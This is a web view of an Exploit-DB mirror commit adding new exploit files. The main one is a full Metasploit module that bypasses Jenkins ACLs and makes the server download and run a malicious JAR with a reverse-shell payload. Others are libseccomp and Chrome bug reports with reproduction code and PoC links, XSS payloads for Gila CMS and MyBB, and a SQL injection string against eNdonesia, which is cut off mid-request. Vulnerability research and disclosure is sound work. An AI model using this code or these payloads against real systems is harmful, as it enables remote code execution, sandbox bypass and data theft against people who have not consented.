bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-03-20

Browse source 
16 changes to exploits/shellcodes

libseccomp < 2.4.0 - Incorrect Compilation of Arithmetic Comparisons
Google Chrome < M73 - Double-Destruction Race in StoragePartitionService
Google Chrome < M73 - Data Race in ExtensionsGuestViewMessageFilter
Microsoft Internet Explorer 11 - VBScript Execution Policy Bypass in MSHTML
Microsoft VBScript - VbsErase Memory Corruption
Microsoft Edge - Flash click2play Bypass with CObjectElement::FinalCreateObject
Google Chrome < M73 - MidiManagerWin Use-After-Free
Google Chrome < M73 - FileSystemOperationRunner Use-After-Free

Advanced Host Monitor 11.92 beta - Local Buffer Overflow

Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE (Metasploit)

TheCarProject v2 - Multiple SQL Injection
TheCarProject 2 - Multiple SQL Injection
Gila CMS 1.9.1 - Cross-Site Scripting
MyBB Upcoming Events Plugin 1.32 - Cross-Site Scripting
eNdonesia Portal 8.7 - Multiple Vulnerabilities
Netartmedia Event Portal 2.0 - 'Email' SQL Injection
Netartmedia PHP Mall 4.1 - SQL Injection
Netartmedia Real Estate Portal 5.0 - SQL Injection
This commit is contained in:
Offensive Security 2019-03-20 05:01:53 +00:00
parent 2a394cba09
commit 2afed97ceb
17 changed files with 1247 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

280
exploits/java/remote/46572.rb Executable file
View file

@ -0,0 +1,280 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Jenkins ACL Bypass and Metaprogramming RCE',
'Description' => %q{
This module exploits a vulnerability in Jenkins dynamic routing to
bypass the Overall/Read ACL and leverage Groovy metaprogramming to
download and execute a malicious JAR file.
The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work
on later versions of Jenkins.
Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.
},
'Author' => [
'Orange Tsai', # Discovery and PoC
'wvu' # Metasploit module
],
'References' => [
['CVE', '2019-1003000'], # Script Security
['CVE', '2019-1003001'], # Pipeline: Groovy
['CVE', '2019-1003002'], # Pipeline: Declarative
['EDB', '46427'],
['URL', 'https://jenkins.io/security/advisory/2019-01-08/'],
['URL', 'https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html'],
['URL', 'https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html'],
['URL', 'https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc']
],
'DisclosureDate' => '2019-01-08', # Public disclosure
'License' => MSF_LICENSE,
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Privileged' => false,
'Targets' => [
['Jenkins <= 2.137 (Pipeline: Groovy Plugin <= 2.61)',
'Version' => Gem::Version.new('2.137')
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {'PAYLOAD' => 'java/meterpreter/reverse_https'},
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
'Reliability' => [REPEATABLE_SESSION]
},
'Stance' => Stance::Aggressive # Be aggressive, b-e aggressive!
))
register_options([
Opt::RPORT(8080),
OptString.new('TARGETURI', [true, 'Base path to Jenkins', '/'])
])
register_advanced_options([
OptBool.new('ForceExploit', [false, 'Override check result', false])
])
deregister_options('URIPATH')
end
=begin
http://jenkins.local/securityRealm/user/admin/search/index?q=[keyword]
=end
def check
checkcode = CheckCode::Safe
res = send_request_cgi(
'method' => 'GET',
'uri' => go_go_gadget1('/search/index'),
'vars_get' => {'q' => 'a'}
)
unless res && (version = res.headers['X-Jenkins'])
vprint_error('Jenkins not detected')
return CheckCode::Unknown
end
vprint_status("Jenkins #{version} detected")
checkcode = CheckCode::Detected
if Gem::Version.new(version) > target['Version']
vprint_error("Jenkins #{version} is not a supported target")
return CheckCode::Safe
end
vprint_good("Jenkins #{version} is a supported target")
checkcode = CheckCode::Appears
if res.body.include?('Administrator')
vprint_good('ACL bypass successful')
checkcode = CheckCode::Vulnerable
else
vprint_error('ACL bypass unsuccessful')
return CheckCode::Safe
end
checkcode
end
def exploit
unless check == CheckCode::Vulnerable || datastore['ForceExploit']
fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
end
# NOTE: Jenkins/Groovy/Ivy uses HTTP unconditionally, so we can't use HTTPS
# HACK: Both HttpClient and HttpServer use datastore['SSL']
ssl = datastore['SSL']
datastore['SSL'] = false
start_service('Path' => '/')
datastore['SSL'] = ssl
print_status('Sending Jenkins and Groovy go-go-gadgets')
send_request_cgi(
'method' => 'GET',
'uri' => go_go_gadget1,
'vars_get' => {'value' => go_go_gadget2}
)
end
#
# Exploit methods
#
=begin
http://jenkins.local/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword
?apiUrl=http://169.254.169.254/%23
&login=orange
&password=tsai
=end
def go_go_gadget1(custom_uri = nil)
# NOTE: See CVE-2018-1000408 for why we don't want to randomize the username
acl_bypass = normalize_uri(target_uri.path, '/securityRealm/user/admin')
return normalize_uri(acl_bypass, custom_uri) if custom_uri
normalize_uri(
acl_bypass,
'/descriptorByName',
'/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile'
)
end
=begin
http://jenkins.local/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
?value=
@GrabConfig(disableChecksums=true)%0a
@GrabResolver(name='orange.tw', root='http://[your_host]/')%0a
@Grab(group='tw.orange', module='poc', version='1')%0a
import Orange;
=end
def go_go_gadget2
(
<<~EOF
@GrabConfig(disableChecksums=true)
@GrabResolver('http://#{srvhost_addr}:#{srvport}/')
@Grab('#{vendor}:#{app}:#{version}')
import #{app}
EOF
).strip
end
#
# Payload methods
#
#
# If you deviate from the following sequence, you will suffer!
#
# HEAD /path/to/pom.xml -> 404
# HEAD /path/to/payload.jar -> 200
# GET /path/to/payload.jar -> 200
#
def on_request_uri(cli, request)
vprint_status("#{request.method} #{request.uri} requested")
unless %w[HEAD GET].include?(request.method)
vprint_error("Ignoring #{request.method} request")
return
end
if request.method == 'HEAD'
if request.uri != payload_uri
vprint_error('Sending 404')
return send_not_found(cli)
end
vprint_good('Sending 200')
return send_response(cli, '')
end
if request.uri != payload_uri
vprint_error('Sending bogus file')
return send_response(cli, "#{Faker::Hacker.say_something_smart}\n")
end
vprint_good('Sending payload JAR')
send_response(
cli,
payload_jar,
'Content-Type' => 'application/java-archive'
)
# XXX: $HOME may not work in some cases
register_dir_for_cleanup("$HOME/.groovy/grapes/#{vendor}")
end
def payload_jar
jar = payload.encoded_jar
jar.add_file("#{app}.class", exploit_class)
jar.add_file(
'META-INF/services/org.codehaus.groovy.plugins.Runners',
"#{app}\n"
)
jar.pack
end
=begin javac Exploit.java
import metasploit.Payload;
public class Exploit {
public Exploit(){
try {
Payload.main(null);
} catch (Exception e) { }
}
}
=end
def exploit_class
klass = Rex::Text.decode_base64(
<<~EOF
yv66vgAAADMAFQoABQAMCgANAA4HAA8HABAHABEBAAY8aW5pdD4BAAMoKVYB
AARDb2RlAQANU3RhY2tNYXBUYWJsZQcAEAcADwwABgAHBwASDAATABQBABNq
YXZhL2xhbmcvRXhjZXB0aW9uAQAHRXhwbG9pdAEAEGphdmEvbGFuZy9PYmpl
Y3QBABJtZXRhc3Bsb2l0L1BheWxvYWQBAARtYWluAQAWKFtMamF2YS9sYW5n
L1N0cmluZzspVgAhAAQABQAAAAAAAQABAAYABwABAAgAAAA3AAEAAgAAAA0q
twABAbgAAqcABEyxAAEABAAIAAsAAwABAAkAAAAQAAL/AAsAAQcACgABBwAL
AAAA
EOF
)
# Replace length-prefixed string "Exploit" with a random one
klass.sub(/.Exploit/, "#{[app.length].pack('C')}#{app}")
end
#
# Utility methods
#
def payload_uri
"/#{vendor}/#{app}/#{version}/#{app}-#{version}.jar"
end
def vendor
@vendor ||= Faker::App.author.split(/[^[:alpha:]]/).join
end
def app
@app ||= Faker::App.name.split(/[^[:alpha:]]/).join
end
def version
@version ||= Faker::App.semantic_version
end
end

282
exploits/linux/dos/46564.txt Normal file
View file

@ -0,0 +1,282 @@
When libseccomp compiles filters for 64-bit systems, it needs to split 64-bit
comparisons into 32-bit comparisons because classic BPF can't operate on 64-bit
values directly.
libseccomp offers both bitwise comparisons (NE, EQ, MASKED_EQ) and arithmetic
comparisons (LT, LE, GE, GT). Bitwise comparisons can always be implemented with
no more than two comparisons; but that doesn't work for arithmetic comparisons.
Consider the case where a filter attempts to check whether
args[0]<0x123456789abc. The cases are:
args[0].high < 0x1234: matches
args[0].high > 0x1234: no match
args[0].high == 0x1234 && args[0].low < 0x56789abc: matches
args[0].high == 0x1234 && args[0].low >= 0x56789abc: no match
So in pseudocode, you'd want something like the following:
if args[0].high < 0x1234
return ACCEPT
if args[0].high > 0x1234
return REJECT
if args[0].low < 0x56789abc
return ACCEPT
return REJECT
But actually, when libseccomp is invoked as follows:
scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_ALLOW);
if (ctx == NULL) err(1, "seccomp_init");
if (seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EBADSLT), SCMP_SYS(mincore), 1,
SCMP_A0(SCMP_CMP_LT, 0x123456789abcUL)))
err(1, "seccomp_rule_add");
if (seccomp_load(ctx))
err(1, "seccomp_load");
it generates the following seccomp filter:
# ./seccomp_dump 96148 simple
===== filter 0 (13 instructions) =====
0001 if arch != X86_64: [true +10, false +0] -> ret KILL
0003 if nr < 0x40000000: [true +1, false +0]
0005 if nr != 0x0000001b: [true +5, false +0] -> ret ALLOW (syscalls: <TOO MANY TO LIST>)
0007 if args[0].high < 0x00001234: [true +2, false +0] -> ret ERRNO
0009 if args[0].low >= 0x56789abc: [true +1, false +0] -> ret ALLOW (syscalls: mincore)
000a ret ERRNO
[...]
As you can see, the case of `args[0].high > 0x1234 && args[0].low < 0x56789abc`
is handled incorrectly.
Here's a demo, tested with libseccomp from git master:
===========================================
jannh@jannh2:~/tests/libseccomp-stuff$ cat compare.c
#include <seccomp.h>
#include <err.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include <sys/mman.h>
// any mincore() starting below this address should be denied with -EBADSLT
#define ADDR_LIMIT 0x123456789abcUL
static void sctest(unsigned long addr) {
unsigned char vec;
printf("mincore(0x%012lx, 0) = ", addr);
int res = mincore((void*)addr, 0, &vec);
if (res == 0) {
printf(" 0\n");
} else {
printf("-%d (%m)\n", errno);
}
}
int main(int argc, char **argv) {
setbuf(stdout, NULL);
printf("my pid is %d\n", (int)getpid());
scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_ALLOW);
if (ctx == NULL) err(1, "seccomp_init");
if (seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EBADSLT), SCMP_SYS(mincore), 1,
SCMP_A0(SCMP_CMP_LT, ADDR_LIMIT)))
err(1, "seccomp_rule_add");
if (seccomp_load(ctx))
err(1, "seccomp_load");
sctest(0);
sctest(0x123000000000);
sctest(0x1230f0000000);
sctest(0x123400000000);
sctest(0x123450000000);
sctest(0x123460000000);
sctest(0x1234f0000000);
sctest(0x123500000000);
sctest(0x1235f0000000);
sctest(0x123600000000);
while (1) pause();
}
jannh@jannh2:~/tests/libseccomp-stuff$ gcc -o compare compare.c -Wall -I/h/git/foreign/libseccomp/include/ -L/h/git/foreign/libseccomp/src/.libs -lseccomp -Wl,-rpath /h/git/foreign/libseccomp/src/.libs/
jannh@jannh2:~/tests/libseccomp-stuff$ ./compare
my pid is 104373
mincore(0x000000000000, 0) = -57 (Invalid slot)
mincore(0x123000000000, 0) = -57 (Invalid slot)
mincore(0x1230f0000000, 0) = -57 (Invalid slot)
mincore(0x123400000000, 0) = -57 (Invalid slot)
mincore(0x123450000000, 0) = -57 (Invalid slot)
mincore(0x123460000000, 0) = 0
mincore(0x1234f0000000, 0) = 0
mincore(0x123500000000, 0) = -57 (Invalid slot)
mincore(0x1235f0000000, 0) = 0
mincore(0x123600000000, 0) = -57 (Invalid slot)
===========================================
This probably isn't terribly interesting for most users of libseccomp, but the
Tor daemon
(https://gitweb.torproject.org/tor.git/tree/src/lib/sandbox/sandbox.c) does use
arithmetic comparisons to prevent writes to a certain memory region:
===========================================
/*
* Allow mprotect with PROT_READ|PROT_WRITE because openssl uses it, but
* never over the memory region used by the protected strings.
*
* PROT_READ|PROT_WRITE was originally fully allowed in sb_mprotect(), but
* had to be removed due to limitation of libseccomp regarding intervals.
*
* There is a restriction on how much you can mprotect with R|W up to the
* size of the canary.
*/
ret = seccomp_rule_add_3(ctx, SCMP_ACT_ALLOW, SCMP_SYS(mprotect),
SCMP_CMP(0, SCMP_CMP_LT, (intptr_t) pr_mem_base),
SCMP_CMP(1, SCMP_CMP_LE, MALLOC_MP_LIM),
SCMP_CMP(2, SCMP_CMP_EQ, PROT_READ|PROT_WRITE));
[...]
ret = seccomp_rule_add_3(ctx, SCMP_ACT_ALLOW, SCMP_SYS(mprotect),
SCMP_CMP(0, SCMP_CMP_GT, (intptr_t) pr_mem_base + pr_mem_size +
MALLOC_MP_LIM),
SCMP_CMP(1, SCMP_CMP_LE, MALLOC_MP_LIM),
SCMP_CMP(2, SCMP_CMP_EQ, PROT_READ|PROT_WRITE));
[...]
===========================================
systemd also has some code that uses arithmetic comparisons in
https://github.com/systemd/systemd/blob/master/src/shared/seccomp-util.c ,
specifically for two purposes:
- If you whitelist a range of address families for socket() using
RestrictAddressFamilies, anything outside that range gets blocked with
SCMP_CMP_LT/SCMP_CMP_GT.
- If you restrict the use of scheduling classes, anything above the permitted
class is blocked via SCMP_CMP_GT.
(Both of these, by the way, are for syscalls that silently discard the upper 32
bits of their arguments.)
The start of the second seccomp filter generated for a systemd unit with
"RestrictAddressFamilies=AF_INET AF_INET6" is:
===== filter 1 (57 instructions) =====
0001 if arch != X86_64: [true +54, false +0] -> ret ALLOW (syscalls: <TOO MANY TO LIST>)
0003 if nr < 0x40000000: [true +1, false +0]
0005 if nr != 0x00000029: [true +50, false +0] -> ret ALLOW (syscalls: <TOO MANY TO LIST>)
0007 if args[0].high != 0x00000000: [true +42, false +0]
0033 if args[0].high < 0x00000000: [true +3, false +0] -> ret ERRNO
0035 if args[0].low > 0x0000000a: [true +1, false +0] -> ret ERRNO
0036 if args[0].low >= 0x00000002: [true +1, false +0] -> ret ALLOW (syscalls: socket)
0037 ret ERRNO
So this filter will e.g. permit socket() calls in the range from 0x100000002 to
0x10000000a (and the kernel will ignore the high bit, meaning that in effect,
this filter grants access to families like AF_AX25); but as far as I can tell,
the other filter installed by systemd prevents this.
In the open-source users of libseccomp that I have been able to find on
codesearch.debian.net, this issue doesn't seem to have significant
impact; but someone might rely on this behavior, so I've decided to treat this
as a security bug.
##############################
Oh, I misread the other filter; that one applies to X32 only. So this actually has impact against systemd.
To reproduce on a Debian 10 machine:
Compile the following as /home/user/pause:
==========
#define _GNU_SOURCE
#include <unistd.h>
#include <sys/socket.h>
#include <errno.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <stdio.h>
void try_socket(unsigned long family) {
errno = 0;
int res = syscall(SYS_socket, family, SOCK_STREAM, 0);
printf("socket for family 0x%lx: %d (%m)\n", family, res);
if (res >= 0) close(res);
}
int main(void) {
setbuf(stdout, NULL);
for (unsigned int i=0; i<20; i++) {
try_socket(i);
try_socket(i | 0x100000000UL);
}
while(1) pause();
}
==========
Create a systemd user service as follows:
==========
ser@deb10:~$ cat > .config/systemd/user/addrfam.service
[Unit]
Description=addrfam test
[Service]
ExecStart=/home/user/pause
RestrictAddressFamilies=AF_INET AF_INET6
SystemCallArchitectures=native
[Install]
WantedBy=default.target
user@deb10:~$ systemctl --user enable addrfam.service
Created symlink /home/user/.config/systemd/user/default.target.wants/addrfam.service → /home/user/.config/systemd/user/addrfam.service.
user@deb10:~$ systemctl --user start addrfam.service
user@deb10:~$
==========
And now look at "sudo journalctl | grep pause":
==========
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x0: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x100000000: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x1: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x100000001: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x2: 3 (Success)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x100000002: 3 (Success)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x3: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x100000003: -1 (Socket type not supported)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x4: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x100000004: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x5: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x100000005: -1 (Socket type not supported)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x6: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x100000006: -1 (Socket type not supported)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x7: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x100000007: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x8: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x100000008: -1 (Invalid argument)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x9: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x100000009: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0xa: 3 (Success)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x10000000a: 3 (Success)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0xb: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x10000000b: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0xc: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x10000000c: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0xd: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x10000000d: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0xe: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x10000000e: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0xf: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x10000000f: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x10: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x100000010: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x11: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x100000011: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x12: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x100000012: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x13: -1 (Address family not supported by protocol)
Jan 31 01:09:11 deb10 pause[17824]: socket for family 0x100000013: -1 (Address family not supported by protocol)
==========
As you can see, the normal socket() calls return "-1 (Address family not supported by protocol)" for everything other than AF_INET and AF_INET6; but with a bit set in the high half, e.g. AF_AX25 also works (returning "-1 (Socket type not supported)").

26
exploits/multiple/dos/46565.txt Normal file
View file

@ -0,0 +1,26 @@
There's a race condition in the destruction of the BindingState for bindings to the StoragePartitionService.
It looks like the root cause of the issue is that since we can get two concurrent calls to callbacks returned from mojo::BindingSet::GetBadMessageCallback() from the same BindingSet, which results in a data race destroying the same BindingState.
One case where this can be called is in a synchronous context when validating a received message, or when tearing down the connection. The other context is the callback passed to OpenSessionStorage here
https://cs.chromium.org/chromium/src/content/browser/storage_partition_impl.cc?rcl=59d4c1b34bfde4fbc31f7a40ab7d0e7df58ffd67&l=912
This is then posted to the mojo task runner thread here:
https://cs.chromium.org/chromium/src/content/browser/dom_storage/dom_storage_context_wrapper.cc?rcl=59d4c1b34bfde4fbc31f7a40ab7d0e7df58ffd67&l=433
And can be called on this thread directly here:
https://cs.chromium.org/chromium/src/content/browser/dom_storage/session_storage_context_mojo.cc?rcl=59d4c1b34bfde4fbc31f7a40ab7d0e7df58ffd67&l=140
Since this is a tight race, the repro is not terribly reliable. Opening multiple tabs at once will increase your chances of reproducing to the point where the issue triggers around 50% of the time (on my machine, mileage will vary depending on system load etc...). I found the most convenient way to reproduce was to use a ThreadSanitizer build, but since the most common result is a double-free, this will often crash a normal release build when the freelist corruption is detected.
$ python ./copy_mojo_js_bindings.py /path/to/chrome/.../out/Asan/gen
$ python -m SimpleHTTPServer&
$ /ssd/chrome_trunk/src/out/Tsan/chrome --enable-blink-features=MojoJS
--no-sandbox --user-data-dir=/tmp/aa 'http://localhost:8000/index.html' 'http://localhost:8000/index.html' 'http://localhost:8000/index.html' 'http://localhost:8000/index.html' 'http://localhost:8000/index.html' 'http://localhost:8000/index.html' 'http://localhost:8000/index.html' 'http://localhost:8000/index.html'
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/46565.zip

31
exploits/multiple/dos/46566.txt Normal file
View file

@ -0,0 +1,31 @@
There appears to be a race condition in the destruction of the ExtensionsGuestViewMessageFilter if the ProcessIdToFilterMap is modified concurrently.
See the comment in the code:
ExtensionsGuestViewMessageFilter::~ExtensionsGuestViewMessageFilter() {
DCHECK_CURRENTLY_ON(BrowserThread::IO);
// This map is created and accessed on the UI thread. Remove the reference to
// |this| here so that it will not be accessed again; but leave erasing the
// key from the global map to UI thread to avoid races when accessing the
// underlying data structure (https:/crbug.com/869791).
(*GetProcessIdToFilterMap())[render_process_id_] = nullptr;
base::PostTaskWithTraits(
FROM_HERE, BrowserThread::UI,
base::BindOnce(RemoveProcessIdFromGlobalMap, render_process_id_));
}
This comment doesn't describe behaviour that appears to be safe to me - there's no explicit mention of the safety of concurrent modification of base::flat_map; but it is noted that iterators are invalidated on insertion/erase, so as there is no further synchronisation, it doesn't appear that it is safe to read or write from this map if another thread may be concurrently modifying it.
This issue was detected by TSAN during fuzzing; but I don't think the behaviour is related to the fuzz case - it's just a dormant issue that was caught. I've attached the TSAN splat that resulted, but I don't have a reliable testcase to reproduce this issue.
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.
Ah, you can reproduce this quite easily without even having a compromised renderer. Before I submitted the report to Chrome I thought I should try just spawning lots of renderers, and that repros fairly quickly - still the same (benign, I think) race that's occuring, but that's unsurprising since the renderers in this case aren't doing anything. The attached testcase triggers in < 5 min with a TSAN build.
The testcase assumes that the domains test0.com - test63.com all resolve to your local server.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/46566.zip

15
exploits/multiple/dos/46570.txt Normal file
View file

@ -0,0 +1,15 @@
MidiManagerWin uses a similar instance_id mechanism to the TaskService implementation to ensure that delayed tasks are only executed if the MidiManager instance that they were scheduled on is still alive.
However, this instance_id is an int, and there is no check that it hasn't overflowed, unlike in the linux and mac implementations (MidiManagerAlsa), see https://cs.chromium.org/chromium/src/media/midi/midi_manager_alsa.cc?rcl=282aae73b9d2c1cbf12d3c39a8d3d2612e4b1876&l=175
This means that if (for example) a delayed sendData on a stale MidiManagerWin instance is queued up, and then the instance id is wrapped, this will trigger a use-after-free when that task triggers.
This bug would be theoretically reachable directly from javascript, but I think that since it's not possible to directly tear down a midi session using the WebMIDI api that this would require too much time to be feasible (as it would require creating a new frame for every increment). However, it can be triggered in a reasonable amount of time from a compromised renderer making direct Mojo calls.
The timing required for the resulting code is quite sensitive to changes in the order of Mojo messages being received; my original approach needed 6 months, but I have the time needed to cause the overflow down to ~4 days from a compromised renderer using the MojoJS javascript bindings.
I've attached a PoC (using the MojoJS bindings) that demonstrates the issue in a more convenient amount of time for testing if you patch the variable `static int id` in IssueNextInstanceId to a `static short`. Runtime will also be shorter if you run the PoC directly after booting; it also has to synchronise clocks with the system clock, and I haven't put any work into making that quick.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/46570.zip

51
exploits/multiple/dos/46571.txt Normal file
View file

@ -0,0 +1,51 @@
There's a comment in FileSystemOperationRunner::BeginOperation
OperationID FileSystemOperationRunner::BeginOperation(
std::unique_ptr<FileSystemOperation> operation) {
OperationID id = next_operation_id_++;
// TODO(https://crbug.com/864351): Diagnostic to determine whether OperationID
// wrap-around is occurring in the wild.
DCHECK(operations_.find(id) == operations_.end());
// ! If id already in operations_, this will free operation
operations_.emplace(id, std::move(operation));
return id;
}
The id is an int, and it can wrap, and if it does this will cause a use-after-free in the browser process, since the normal usage of BeginOperation is the following:
OperationID FileSystemOperationRunner::Truncate(const FileSystemURL& url,
int64_t length,
StatusCallback callback) {
base::File::Error error = base::File::FILE_OK;
std::unique_ptr<FileSystemOperation> operation = base::WrapUnique(
file_system_context_->CreateFileSystemOperation(url, &error));
// ! take a raw pointer to the contents of the unique_ptr
FileSystemOperation* operation_raw = operation.get();
// ! call BeginOperation passing the move'd unique_ptr, freeing operation
OperationID id = BeginOperation(std::move(operation));
base::AutoReset<bool> beginning(&is_beginning_operation_, true);
if (!operation_raw) {
DidFinish(id, std::move(callback), error);
return id;
}
PrepareForWrite(id, url);
// ! use the raw free'd pointer here.
operation_raw->Truncate(url, length,
base::BindOnce(&FileSystemOperationRunner::DidFinish,
weak_ptr_, id, std::move(callback)));
return id;
}
I think that to trigger this, you'd need either a malformed blob in the blob registry, or access to the FileWriter api, so at present this would require a compromised renderer.
I've attached two PoCs that should trigger this issue; it looks like the runtime for either approach from javascript should take ~2 days on my machine. (I'd suggest patching the OperationId typedef to short to reproduce, unless you are extremely patient).
$ python ./copy_mojo_js_bindings.py /path/to/chrome/.../out/Asan/gen
$ python -m SimpleHTTPServer&
$ /ssd/chrome_trunk/src/out/Asan/chrome --enable-blink-features=MojoJS --user-data-dir=/tmp/aa 'http://localhost:8000/id_overflow_no_filewriter.html'
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/46571.zip

16
exploits/php/webapps/46557.txt Normal file
View file

@ -0,0 +1,16 @@
# Exploit Title: Gila CMS (search) Cross Site Scripting
# Google Dork: intext:"Powered By Gila CMS"
# Date: 11.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://gilacms.com
# Software Link: https://gilacms.com/packages/downloadRelease/1.9.1.zip
# Demo Site: https://gilacms.com/demo/
# Version: 1.9.1
# Tested on: Kali Linux
# CVE: CVE-2019-9647
# Vulnerable Parameter: search
# Payload: <--`<img/src=` onerror=confirm``> --!>
# GET Request: http://localhost/?search=<--`<img/src=` onerror=confirm``> --!>

26
exploits/php/webapps/46558.txt Normal file
View file

@ -0,0 +1,26 @@
# Exploit Title: MyBB Upcoming Events Plugin 1.32 - Cross-Site Scripting
# Date: 3/8/2019
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1231
# Version: 1.32
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-9650
1. Description:
This plugin shows upcoming calendar events on the forum index and portal page. Event names are vulnerable to XSS.
2. Proof of Concept:
- Go to the calander.php page and add a new event
- Input a payload for the event name <script>alert('XSS')</script>
Payload will be executed on index.php
3. Solution:
Update to 1.33

122
exploits/php/webapps/46559.txt Normal file
View file

@ -0,0 +1,122 @@
===========================================================================================
# Exploit Title: eNdonesia Portal 'banners.php' SQL Inj.
# Dork: N/A
# Date: 19-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.endonesia.org/
# Software Link: https://sourceforge.net/projects/endonesia/
# Version: v8.7
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: eNdonesia ia a portal software, content management system (CMS) site management system , online publishing system, or whatever you want to name it. For internet, intranet, or on your own PC.
===========================================================================================
# POC - SQLi
# Parameters : bid, banners.php
# Attack Pattern :
-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)
# GET Method : http://localhost/endonesia87/banners.php?op=click&bid=-1 or
1=1 and (SELECT 1 and ROW(1,1)>(SELECT
